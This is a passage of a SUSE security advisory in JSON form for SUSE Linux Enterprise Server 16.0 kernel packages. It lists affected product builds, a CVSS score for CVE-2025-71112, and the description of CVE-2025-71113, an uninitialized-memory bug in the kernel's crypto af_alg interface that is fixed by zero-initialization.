"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - zero initialize memory allocated via sock_kmalloc\n\nSeveral crypto user API contexts and requests allocated with\nsock_kmalloc() were left uninitialized, relying on callers to\nset fields explicitly. This resulted in the use of uninitialized\ndata in certain error paths or when new fields are added in the\nfuture.\n\nThe ACVP patches also contain two user-space interface files:\nalgif_kpp.c and algif_akcipher.c. These too rely on proper\ninitialization of their context structures.\n\nA particular issue has been observed with the newly added\n\u0027inflight\u0027 variable introduced in af_alg_ctx by commit:\n\n 67b164a871af (\"crypto: af_alg - Disallow multiple in-flight AIO requests\")\n\nBecause the context is not memset to zero after allocation,\nthe inflight variable has contained garbage values. As a result,\naf_alg_alloc_areq() has incorrectly returned -EBUSY randomly when\nthe garbage value was interpreted as true:\n\n https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nThe check directly tests ctx-\u003einflight without explicitly\ncomparing against true/false. Since inflight is only ever set to\ntrue or false later, an uninitialized value has triggered\n-EBUSY failures. Zero-initializing memory allocated with\nsock_kmalloc() ensures inflight and other fields start in a known\nstate, removing random issues caused by uninitialized data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
